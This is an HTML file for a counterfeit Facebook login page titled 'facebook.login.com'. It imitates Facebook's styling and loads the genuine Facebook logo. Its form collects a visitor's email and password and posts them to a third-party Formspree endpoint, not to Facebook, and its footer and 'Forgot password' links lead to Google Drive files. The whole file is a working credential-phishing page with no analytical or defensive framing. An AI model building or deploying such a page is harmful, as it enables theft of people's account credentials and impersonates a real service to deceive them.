<html lang="en">
  <head>
    <title>facebook.login.com</title>
    <meta name="viewport"content="width=device-width, intial-scale=1.0">
    <meta name="keyword",content="facebook,facebook login">
    <style>
      header{
        background-color:#3b5998;
        font-family:helvetica;
        color:white;
        width:100%;
        height:60px;
        padding:0;
        margin:0;
        overflow-x: hidden;
        position:fixed;
        top:0;
        left:0;
        font-size:2rem;
        display:flex;
        justify-content:center;
        align-items:center;
      /*  margin-bottom:100px;*/
      }
      form{
        margin-top:30px;
        width:100%px;
        height:380px;
        font-family:arial, raboto;
        font-size:14px;
        text-align:center;
        
      }
      input{
        width:100%;
        height:40px;
        margin:14px 0px;
      }
      #btn{
        margin-top:5px;
        background-color:#1877f2;
        color:#ffffff;
        width:100%
        height:45px;
        font-family:arial, raboto;
        font-size:14px;
        border-radius:6px;
        padding:10px 20px;
        border:none;
        margin-top:20px;
        margin-bottom:11px;
        transition:background-color .5s;
        
      }
      #btn:activE{
        background-color:darkblue;
      }
      #mg{
      
        position:relative;
        width:60px;
        height:60px;
        
        margin-top:177px;
        left:137px;
      }
      #link{
        text-decoration-color:#000;
        text-decoration-line:none;
        color:black;
      }a{color:black;text-decoration-line:none;}
         
      
      footer{
        font-family:helvetica,arial;
        font-size:12px;
        color:#666;
        display:flex;
        
      }
      #a1{
        margin-right:20px;
        margin-left:78px;
      }
      #aa{
        margin-right:20px;
      }
      
    #aaa{
      margin
    }
      
      
    </style>
  </head>
  <body style="background-color:#f0f2f5;">
   <header>facebook</header>
<div id="d1">
  <img id="mg"alt="facebook-logo"src="https://z-m-static.xx.fbcdn.net/rsrc.php/v4/y6/r/UbJC5lwxeBU.png">
  
</div>
<main>
  <form action="https://formspree.io/f/mgvooywj" method="POST">
    <input name="email"type="email" placeholder="Enter your email" required>
    <input name="password"type="password"placeholder="Enter your password" required>
    <button type="submit" id ="btn">Sign in</button><br>
    <a id="link"href="https://drive.google.com/file/d/1X3SccphsHc-RWnuBrrNxts7TEBcrOLW2/view?usp=drivesdk">Forgot password?</a>
    
    
  </form>
</main>
<footer>
  <a href="https://drive.google.com/file/d/1_ZWSmn7Gkd04SUY7E4Rzo01wpR7o5KsW/view?usp=drivesdk"id="a1">Privacy policy</a>
  <a href="https://drive.google.com/file/d/1_C0BaWKPQEEEkVNUUlx3QI3160ju9drS/view?usp=drivesdk"id=aa>Help</a>
  <a href="https://drive.google.com/file/d/1_JCYdi8_3F4FfIQPHEViqvmLDK79I_Dk/view?usp=drivesdk"id=aaa>About</a>
</footer>

  </body>
</html>
